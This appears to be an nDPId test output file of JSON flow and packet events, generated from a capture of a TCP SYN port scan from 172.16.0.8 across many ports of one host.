-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAspWAAADAGcxKsEAAIQA2GNIzSA9vdUoMYAAAAAGACBAAwtAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsErEAADIGA8KsEAAIQA2GNIzSFi\/dUoMYAAAAAGACDAAWYAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsop0AADoGa9WsEAAIQA2GNIzSH\/TdUoMYAAAAAGACDAAMmwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAslLkAADMGgLmsEAAIQA2GNIzSELfdUoMYAAAAAGACEAAX2AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsXlUAACcGwx2sEAAIQA2GNIzSOGndUoMYAAAAAGACEADwJQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsVpgAAC4Gw9qsEAAIQA2GNIzSrZvdUoMYAAAAAGACDAB+8wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsXgQAADAGum6sEAAIQA2GNIzSJZLdUoMYAAAAAGACBAAO\/QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsjFAAADcGhSKsEAAIQA2GNIzSCP3dUoMYAAAAAGACEAAfkgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsL8IAADcG4bCsEAAIQA2GNIzSxnDdUoMYAAAAAGACEABiHgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsMfQAADUG4X6sEAAIQA2GNIzSH0rdUoMYAAAAAGACCAARRQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAs20cAACgGRSusEAAIQA2GNIzTJqzdU4MZAAAAAGACBAAN4AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsr4EAACgGcPGsEAAIQA2GNIzTB7bdU4MZAAAAAGACBAAs1gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsGqAAADAG\/dKsEAAIQA2GNIzTJvDdU4MZAAAAAGACBAANnAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsirAAACYGl8KsEAAIQA2GNIzTMDndU4MZAAAAAGACDAD8UgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsQVwAACoG3RasEAAIQA2GNIzTOprdU4MZAAAAAGACDADx8QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsW1IAADcGtiCsEAAIQA2GNIzTK2bdU4MZAAAAAGACEAD9JQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsZJ0AACUGvtWsEAAIQA2GNIzTL47dU4MZAAAAAGACCAAA\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsrSEAACcGdFGsEAAIQA2GNIzTBKjdU4MZAAAAAGACEAAj5AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAshwoAADsGhmisEAAIQA2GNIzTBkDdU4MZAAAAAGACEAAiTAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsAsYAACwGGa2sEAAIQA2GNIzTDrbdU4MZAAAAAGACBAAl1gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAslzwAADkGeDasEAAIQA2GNIzT2QPdU4MZAAAAAGACCABXiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsAgkAACYGIGqsEAAIQA2GNIzTBF\/dU4MZAAAAAGACDAAoLQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsLeMAADoG4I+sEAAIQA2GNIzTC7\/dU4MZAAAAAGACDAAgzQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs82YAADUGIAysEAAIQA2GNIzTFbjdU4MZAAAAAGACCAAa1AAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAskFEAACgGkCGsEAAIQA2GNIzTA9XdU4MZAAAAAGACBAAwtwAAAgQFtA=="} 